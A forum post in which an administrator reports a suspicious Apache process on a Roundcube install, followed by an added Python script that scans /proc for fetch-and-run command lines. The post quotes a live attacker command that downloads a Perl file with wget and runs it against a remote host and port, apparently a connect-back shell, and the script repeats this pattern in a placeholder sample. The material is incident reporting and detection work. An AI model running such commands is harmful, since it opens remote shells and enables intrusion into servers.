floyd
Verified User
- Joined: Mar 29, 2005
- Messages: 6,168
I have a script that regularly checks for running apache processes that are out of the ordinary. It kills them and lets me know what they were.
I got this today.
Process:
Code:
apache 28505 0.0 0.0 4528 1084 ? S 08:24 0:00 sh -c wget 64.62.225.99/~jhtech/cback.txt -O /var/tmp/cb.txt;/usr/bin/perl /var/tmp/cb.txt 64.62.225.99 8003
ls -l /proc/28505
Code:
dr-xr-xr-x 2 apache apache 0 Dec 25 08:25 attr
-r-------- 1 apache apache 0 Dec 25 08:25 auxv
-r--r--r-- 1 apache apache 0 Dec 25 08:25 cmdline
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 coredump_filter
-r--r--r-- 1 apache apache 0 Dec 25 08:25 cpuset
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 cwd -> /var/www/html/roundcubemail-0.1.1/bin
-r-------- 1 apache apache 0 Dec 25 08:25 environ
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 exe -> /bin/bash
dr-x------ 2 apache apache 0 Dec 25 08:25 fd
-r-------- 1 apache apache 0 Dec 25 08:25 limits
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 loginuid
-r--r--r-- 1 apache apache 0 Dec 25 08:25 maps
-rw------- 1 apache apache 0 Dec 25 08:25 mem
-r--r--r-- 1 apache apache 0 Dec 25 08:25 mounts
-r-------- 1 apache apache 0 Dec 25 08:25 mountstats
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 oom_adj
-r--r--r-- 1 apache apache 0 Dec 25 08:25 oom_score
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 root -> /
-r--r--r-- 1 apache apache 0 Dec 25 08:25 schedstat
-r-------- 1 apache apache 0 Dec 25 08:25 smaps
-r--r--r-- 1 apache apache 0 Dec 25 08:25 stat
-r--r--r-- 1 apache apache 0 Dec 25 08:25 statm
-r--r--r-- 1 apache apache 0 Dec 25 08:25 status
dr-xr-xr-x 3 apache apache 0 Dec 25 08:25 task
-r--r--r-- 1 apache apache 0 Dec 25 08:25 wchan
Looks like somebody was using roundcube to wget a file. Is this a roundcube vulnerability? Any ideas of what I need to do to secure the server more?
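A defender-side example added to this thread, not floyd's own script: it walks /proc, keeps only processes owned by a web-server account, and flags command lines that look like the fetch-and-run chain shown above (a downloader, an interpreter pointed at a file in a scratch directory, and a `sh -c` wrapper with command separators). It also records the `cwd`, `exe` and parent pid of a hit, since those are what showed the Roundcube `bin` directory in the `ls -l /proc/28505` listing and are lost the moment the process is killed. Assumptions: the web server runs as `apache`, `www-data` or `nobody`; drop directories are `/var/tmp`, `/tmp` and `/dev/shm`; the sample records are constructed and use the placeholder address 192.0.2.10 rather than the one in the post.

```python
#!/usr/bin/env python3
"""Flag web-server processes whose command line looks like a fetch-and-run chain.

Added example for this thread; not floyd's script. Linux only (reads /proc).
Assumptions: the web server runs as one of WEB_USERS and fetched payloads land
in one of DROP_DIRS. Sample data below is constructed (placeholder 192.0.2.10).
"""
import os
import pwd
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Tuple

WEB_USERS = {"apache", "www-data", "nobody"}        # assumption: adjust per distro
DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "python", "python2", "python3", "sh", "bash"}
DROP_DIRS = ("/var/tmp/", "/tmp/", "/dev/shm/")     # assumption: world-writable scratch


@dataclass
class Finding:
    pid: int
    user: str
    cmdline: str
    reasons: List[str] = field(default_factory=list)


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the reasons a command line looks hostile; empty list means nothing matched."""
    # Split on whitespace and shell separators so "x.txt;/usr/bin/perl" becomes two words.
    tokens = [t for t in re.split(r"[\s;|&]+", cmdline) if t]
    reasons: List[str] = []
    for i, tok in enumerate(tokens):
        base = os.path.basename(tok)
        if base in DOWNLOADERS:
            reasons.append(f"downloader {base}")
        # An interpreter pointed at a file in a scratch directory: the second stage.
        if base in INTERPRETERS and i + 1 < len(tokens) and tokens[i + 1].startswith(DROP_DIRS):
            reasons.append(f"interpreter on {tokens[i + 1]}")
    # "sh -c" plus a separator is how an injected command usually reaches the system.
    if re.search(r"\bsh\s+-c\b", cmdline) and re.search(r"[;|]|&&", cmdline):
        reasons.append("shell chain")
    return reasons


def scan_records(records: Iterable[Tuple[int, str, str]]) -> List[Finding]:
    """Classify (pid, user, cmdline) records that belong to a web-server account."""
    findings = []
    for pid, user, cmdline in records:
        if user in WEB_USERS:
            reasons = classify_cmdline(cmdline)
            if reasons:
                findings.append(Finding(pid, user, cmdline, reasons))
    return findings


def proc_records() -> List[Tuple[int, str, str]]:
    """Read pid, owner and command line for every process visible in /proc."""
    out = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
            uid = os.stat(f"/proc/{pid}").st_uid
        except OSError:          # process exited or permission denied; skip it
            continue
        try:
            user = pwd.getpwuid(uid).pw_name
        except KeyError:
            user = str(uid)
        out.append((pid, user, cmdline))
    return out


def describe_process(pid: int) -> Dict[str, str]:
    """Capture the volatile /proc facts worth keeping before a kill: cwd, exe, parent pid."""
    info: Dict[str, str] = {}
    for link in ("cwd", "exe"):
        try:
            info[link] = os.readlink(f"/proc/{pid}/{link}")
        except OSError:
            info[link] = "?"
    try:
        with open(f"/proc/{pid}/status") as fh:
            info["ppid"] = next(l.split()[1] for l in fh if l.startswith("PPid:"))
    except (OSError, StopIteration):
        info["ppid"] = "?"
    return info


# Constructed sample records shaped like the thread's case, with placeholder values.
SAMPLE_RECORDS = [
    (1201, "root", "/usr/sbin/httpd -DFOREGROUND"),
    (1305, "apache", "/usr/sbin/httpd -DFOREGROUND"),
    (4242, "apache", "sh -c wget 192.0.2.10/payload.txt -O /var/tmp/x.txt;/usr/bin/perl /var/tmp/x.txt 192.0.2.10 8003"),
    (4300, "postfix", "sh -c wget http://mirror.example/index.html -O /tmp/idx.html"),  # not a web user
]

if __name__ == "__main__":
    findings = scan_records(proc_records()) if os.path.isdir("/proc") else []
    if not findings:
        findings = scan_records(SAMPLE_RECORDS)   # nothing live; show the constructed case
    for f in findings:
        print(f"pid {f.pid} ({f.user}): {', '.join(f.reasons)}")
        print(f"  cmdline: {f.cmdline}")
        if os.path.isdir(f"/proc/{f.pid}"):
            print(f"  context: {describe_process(f.pid)}")
```

Run it from cron as root the way the poster's checker runs; the point of `describe_process` is to log `cwd`, `exe` and the parent pid first, so the trail back to the web application survives even if the script then kills the process.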